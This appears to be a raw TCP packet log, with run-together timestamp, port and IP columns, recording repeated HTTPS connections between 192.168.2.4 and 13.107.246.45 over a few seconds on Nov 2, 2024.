                                                                                                                                                                                                                                              Nov 2, 2024 07:15:59.517570019 CET4436374213.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:59.519586086 CET4436373713.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:59.519637108 CET4436373713.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:59.519686937 CET63737443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:59.519778013 CET63737443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:59.519778013 CET63737443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:59.519788027 CET4436373713.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:59.519797087 CET4436373713.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:59.521615028 CET63743443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:59.521641970 CET4436374313.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:59.521712065 CET63743443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:59.521821022 CET63743443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:59.521835089 CET4436374313.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:59.522479057 CET4436374113.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:59.522746086 CET63741443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:59.522753000 CET4436374113.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:59.523127079 CET63741443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:59.523129940 CET4436374113.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:59.539297104 CET4436373913.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:59.539459944 CET4436373913.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:59.539527893 CET63739443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:59.539555073 CET63739443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:59.539562941 CET4436373913.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:59.539571047 CET63739443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:59.539575100 CET4436373913.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:59.541254044 CET63744443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:59.541280985 CET4436374413.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:59.541352987 CET63744443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:59.541466951 CET63744443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:59.541477919 CET4436374413.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:59.552265882 CET4436374013.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:59.552314043 CET4436374013.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:59.552354097 CET63740443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:59.552447081 CET63740443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:59.552455902 CET4436374013.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:59.552464962 CET63740443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:59.552469969 CET4436374013.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:59.554349899 CET63745443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:59.554426908 CET4436374513.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:59.554505110 CET63745443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:59.554604053 CET63745443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:59.554636955 CET4436374513.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:59.654898882 CET4436374113.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:59.655092001 CET4436374113.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:59.655149937 CET63741443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:59.655204058 CET63741443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:59.655210972 CET4436374113.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:59.655220032 CET63741443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:59.655224085 CET4436374113.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:59.657773018 CET63746443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:59.657783031 CET4436374613.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:59.657864094 CET63746443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:59.658021927 CET63746443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:15:59.658034086 CET4436374613.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:00.258647919 CET4436374313.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:00.259324074 CET63743443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:00.259332895 CET4436374313.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:00.259937048 CET63743443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:00.259942055 CET4436374313.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:00.287384987 CET4436374213.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:00.287813902 CET63742443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:00.287828922 CET4436374213.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:00.288218975 CET63742443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:00.288223028 CET4436374213.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:00.301441908 CET4436374413.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:00.301845074 CET63744443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:00.301856041 CET4436374413.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:00.302407026 CET63744443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:00.302411079 CET4436374413.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:00.317305088 CET4436374513.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:00.317800999 CET63745443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:00.317836046 CET4436374513.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:00.318147898 CET63745443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:00.318164110 CET4436374513.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:00.389434099 CET4436374313.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:00.389487028 CET4436374313.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:00.389530897 CET63743443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:00.389659882 CET63743443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:00.389666080 CET4436374313.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:00.389674902 CET63743443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:00.389678955 CET4436374313.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:00.392364979 CET63747443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:00.392410994 CET4436374713.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:00.392497063 CET63747443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:00.392672062 CET63747443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:00.392698050 CET4436374713.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:00.421443939 CET4436374213.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:00.421730042 CET4436374213.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:00.421777010 CET63742443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:00.421914101 CET63742443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:00.421924114 CET4436374213.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:00.422741890 CET4436374613.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:00.423173904 CET63746443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:00.423188925 CET4436374613.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:00.423690081 CET63746443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:00.423693895 CET4436374613.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:00.424438000 CET63748443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:00.424518108 CET4436374813.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:00.424602032 CET63748443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:00.424738884 CET63748443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:00.424772024 CET4436374813.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:00.434353113 CET4436374413.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:00.434561968 CET4436374413.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:00.434617043 CET63744443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:00.434649944 CET63744443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:00.434659004 CET4436374413.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:00.434667110 CET63744443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:00.434670925 CET4436374413.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:00.436714888 CET63749443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:00.436738014 CET4436374913.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:00.436805010 CET63749443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:00.436907053 CET63749443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:00.436916113 CET4436374913.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:00.450987101 CET4436374513.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:00.451180935 CET4436374513.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:00.451236010 CET63745443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:00.451298952 CET63745443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:00.451298952 CET63745443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:00.451339006 CET4436374513.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:00.451364040 CET4436374513.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:00.453449965 CET63750443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:00.453478098 CET4436375013.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:00.453557968 CET63750443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:00.453728914 CET63750443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:00.453742027 CET4436375013.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:00.557827950 CET4436374613.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:00.558211088 CET4436374613.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:00.558273077 CET63746443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:00.558299065 CET63746443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:00.558304071 CET4436374613.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:00.558314085 CET63746443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:00.558316946 CET4436374613.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:00.560065985 CET63751443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:00.560085058 CET4436375113.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:00.560153008 CET63751443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:00.560259104 CET63751443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:00.560267925 CET4436375113.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:01.123157024 CET4436374713.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:01.123555899 CET63747443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:01.123594046 CET4436374713.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:01.124017000 CET63747443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:01.124030113 CET4436374713.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:01.184937000 CET4436375013.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:01.191441059 CET4436374813.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:01.204461098 CET4436374913.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:01.214803934 CET63750443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:01.214848042 CET4436375013.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:01.215221882 CET63750443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:01.215238094 CET4436375013.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:01.215404987 CET63748443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:01.215419054 CET4436374813.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:01.215715885 CET63748443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:01.215725899 CET4436374813.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:01.215924978 CET63749443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:01.215938091 CET4436374913.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:01.216223955 CET63749443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:01.216228008 CET4436374913.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:01.256655931 CET4436374713.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:01.256707907 CET4436374713.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:01.256769896 CET63747443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:01.256900072 CET63747443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:01.256925106 CET4436374713.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:01.256947994 CET63747443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:01.256961107 CET4436374713.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:01.259057999 CET63752443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:01.259087086 CET4436375213.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:01.259165049 CET63752443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:01.259272099 CET63752443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:01.259280920 CET4436375213.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:01.305557013 CET4436375113.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:01.307823896 CET63751443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:01.307832003 CET4436375113.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:01.320688009 CET63751443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:01.320693970 CET4436375113.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:01.340509892 CET4436375013.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:01.340723038 CET4436375013.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:01.340783119 CET63750443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:01.347510099 CET4436374813.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:01.347764015 CET4436374813.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:01.347841024 CET63748443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:01.353738070 CET4436374913.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:01.353935957 CET4436374913.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:01.353987932 CET63749443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:01.447009087 CET4436375113.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:01.447069883 CET4436375113.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:01.447129965 CET63751443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:01.461709976 CET63750443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:01.461709976 CET63750443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:01.461764097 CET4436375013.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:01.461793900 CET4436375013.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:01.469367027 CET63751443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:01.469376087 CET4436375113.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:01.469386101 CET63751443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:01.469391108 CET4436375113.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:01.492842913 CET63748443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:01.492842913 CET63748443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:01.492865086 CET4436374813.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:01.492887020 CET4436374813.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:01.500523090 CET63749443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:01.500530958 CET4436374913.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:01.500543118 CET63749443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:01.500545025 CET4436374913.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:01.561193943 CET63753443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:01.561264038 CET4436375313.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:01.561335087 CET63753443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:01.562558889 CET63754443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:01.562587023 CET4436375413.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:01.562638998 CET63754443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:01.562711954 CET63753443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:01.562722921 CET4436375313.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:01.564687014 CET63755443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:01.564696074 CET4436375513.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:01.564748049 CET63755443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:01.564846992 CET63755443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:01.564852953 CET4436375513.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:01.564996958 CET63754443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:01.565012932 CET4436375413.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:01.568912029 CET63756443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:01.568933964 CET4436375613.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:01.568984985 CET63756443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:01.569089890 CET63756443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:01.569103956 CET4436375613.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:02.028340101 CET4436375213.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:02.028767109 CET63752443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:02.028784037 CET4436375213.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:02.029201984 CET63752443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:02.029206991 CET4436375213.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:02.164850950 CET4436375213.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:02.164999008 CET4436375213.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:02.165049076 CET63752443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:02.165107965 CET63752443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:02.165124893 CET4436375213.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:02.165136099 CET63752443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:02.165139914 CET4436375213.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:02.167363882 CET63757443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:02.167387962 CET4436375713.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:02.167467117 CET63757443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:02.167589903 CET63757443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:02.167603016 CET4436375713.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:02.307681084 CET4436375413.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:02.308010101 CET63754443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:02.308027983 CET4436375413.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:02.308372021 CET63754443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:02.308377028 CET4436375413.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:02.310374022 CET4436375613.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:02.310642958 CET63756443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:02.310657024 CET4436375613.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:02.310936928 CET63756443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:02.310941935 CET4436375613.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:02.314332008 CET4436375513.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:02.314596891 CET63755443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:02.314620972 CET4436375513.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:02.314977884 CET63755443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:02.314984083 CET4436375513.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:02.323483944 CET4436375313.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:02.323834896 CET63753443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:02.323853970 CET4436375313.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:02.324209929 CET63753443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:02.324213982 CET4436375313.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:02.438133955 CET4436375413.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:02.438317060 CET4436375413.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:02.438364983 CET63754443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:02.438821077 CET63754443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:02.438831091 CET4436375413.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:02.438839912 CET63754443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:02.438846111 CET4436375413.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:02.442500114 CET63758443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:02.442524910 CET4436375813.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:02.442586899 CET63758443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:02.442847013 CET4436375613.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:02.442970991 CET4436375613.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:02.443011999 CET63756443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:02.445153952 CET63758443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:02.445163965 CET4436375813.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:02.445310116 CET63756443192.168.2.413.107.246.45
